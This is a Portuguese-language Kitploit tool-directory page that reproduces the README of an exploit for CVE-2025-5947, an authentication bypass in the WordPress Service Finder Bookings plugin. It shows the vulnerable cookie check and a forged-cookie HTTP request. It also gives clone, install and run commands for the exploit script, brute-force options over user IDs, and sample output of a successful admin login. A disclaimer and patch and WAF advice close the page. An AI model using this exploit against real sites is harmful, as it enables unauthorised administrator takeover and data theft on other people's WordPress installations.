Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-5947 — CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit | Kitploit
Ferramentas/GitHubGitHub/xxconi/cve-2025-5947
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubxxconi/cve-2025-5947

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit

Ver Repositório
há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-5947

Exploit do CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0

CVE-2025-5947 Exploit - Service Finder Bookings

License Python Status CVSS

Ferramenta de exploit para a vulnerabilidade de bypass de autenticação no plugin WordPress Service Finder Bookings ≤ 6.0

📋 Índice

  • Sobre a Vulnerabilidade
  • Detalhes Técnicos
  • Instalação
  • Uso
  • Exemplos
  • Resultados
  • Segurança
  • Recursos

🔴 Sobre a Vulnerabilidade

CVE-2025-5947

Service Finder Bookings é um plugin WordPress que possui uma vulnerabilidade crítica de bypass de autenticação nas versões 6.0 e anteriores.

🎯 Impacto

Atacantes não autenticados podem:

  • ✅ Entrar como qualquer usuário
  • ✅ Obter acesso a contas de administrador
  • ✅ Obter controle total do sistema
  • ✅ Vazar dados
  • ✅ Carregar código malicioso

🔍 Detalhes Técnicos

Causa da Vulnerabilidade

A função service_finder_switch_back() possui validação insuficiente de cookie:

root@kitploit:~
// Güvenli olmayan kod
if(isset($_COOKIE['original_user_id'])) {
    $user_id = $_COOKIE['original_user_id'];
    wp_set_current_user($user_id);
    // Doğrulama yok!
}

Vetor de Ataque

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1

Características do Ataque:

  • 🌐 Acesso Remoto (AV:N)
  • 🔓 Sem Autenticação (PR:N)
  • 👤 Sem Interação do Usuário (UI:N)
  • 📊 Impacto Total (C:H, I:H, A:H)

📦 Instalação

Requisitos

  • Python 3.6+
  • biblioteca requests

Passo 1: Clonar o Repositório

root@kitploit:~
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947

Passo 2: Instalar as Dependências

root@kitploit:~
pip install -r requirements.txt

Passo 3: Executar

root@kitploit:~
python exploit.py -u http://target.com

🚀 Uso

Comandos Básicos

root@kitploit:~
# Yardım göster
python exploit.py -h

# Admin (ID=1) olarak giriş dene
python exploit.py -u http://target.com

# Belirli kullanıcı ID'si ile
python exploit.py -u http://target.com -i 5

# Brute force (ID 1-10)
python exploit.py -u http://target.com -b 1-10

# SSL doğrulaması olmadan
python exploit.py -u http://target.com --no-ssl-verify

# Özel timeout ile
python exploit.py -u http://target.com -t 30

Parâmetros

💡 Exemplos

Exemplo 1: Exploit Simples

root@kitploit:~
python exploit.py -u http://wordpress.local

Saída:

root@kitploit:~
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu

🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
   Location: http://wordpress.local/wp-admin/
   Set-Cookie: wordpress_logged_in_abc123=...

✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/

Exemplo 2: Brute Force

root@kitploit:~
python exploit.py -u http://target.com -b 1-20

Saída:

root@kitploit:~
🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]

Exemplo 3: HTTPS sem Verificação SSL

root@kitploit:~
python exploit.py -u https://target.com --no-ssl-verify

📊 Resultados

Um exploit bem-sucedido inclui os seguintes indicadores:

✅ Código de resposta HTTP 301 ou 302
✅ Presença de /wp-admin/ no cabeçalho Location
✅ Presença de wordpress_logged_in_ no cabeçalho Set-Cookie

🛡️ Segurança

⚠️ Aviso Legal

Esta ferramenta deve ser usada apenas para:

  • ✅ Testes de segurança autorizados
  • ✅ Em seus próprios sistemas
  • ✅ Com permissão por escrito

O autor não se responsabiliza pelo uso indevido.

🔐 Formas de Proteção

  1. Atualização Imediata

    root@kitploit:~
    # WordPress admin panelinden güncelle
    # veya WP-CLI ile
    wp plugin update sf-booking
    
  2. Desativar o Plugin

    root@kitploit:~
    wp plugin deactivate sf-booking
    
  3. Remover o Plugin

    root@kitploit:~
    wp plugin delete sf-booking
    
  4. Web Application Firewall (WAF)

    root@kitploit:~
    Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
    
  5. Verificação de Segurança

    • Verifique as contas de administrador
    • Analise os logs de acesso
    • Investigue acessos não autorizados

📚 Recursos

  • Banco de Dados Patchstack
  • GitHub Advisory
  • Detalhes NVD
  • Exploit Original
  • Calculadora CVSS

🤝 Contribuição

Para relatar erros ou sugerir melhorias:

  1. Faça um fork
  2. Crie uma branch de feature (git checkout -b feature/improvement)
  3. Faça o commit (git commit -am 'Add improvement')
  4. Faça o push (git push origin feature/improvement)
  5. Abra um Pull Request

📄 Licença

Licença MIT - Consulte o arquivo LICENSE para obter detalhes

👤 Autor

Pesquisador de Segurança

  • GitHub: @yourusername

🙏 Agradecimentos

  • Patchstack Security Team
  • WordPress Security Community
  • CVE Coordinators

⭐ Se achou útil, dê uma estrela!

🔝 Voltar ao Topo

Baixar ferramenta
RecursoValor
CVE IDCVE-2025-5947
PluginService Finder Bookings (sf-booking)
Versão Afetada≤ 6.0
Gravidade🔴 CRÍTICA
Pontuação CVSS9.8
CWECWE-639 (Authorization Bypass)
Pontuação EPSS0.617 (percentil 98.357)
Data de Publicação2025
ParâmetroAbreviaçãoDescriçãoPadrão
--url-uURL alvo (obrigatório)-
--user-id-iID do usuário1
--brute-force-bIntervalo de brute force (1-10)-
--no-ssl-verify-Desativar verificação SSLFalse
--timeout-tTimeout da solicitação (segundos)10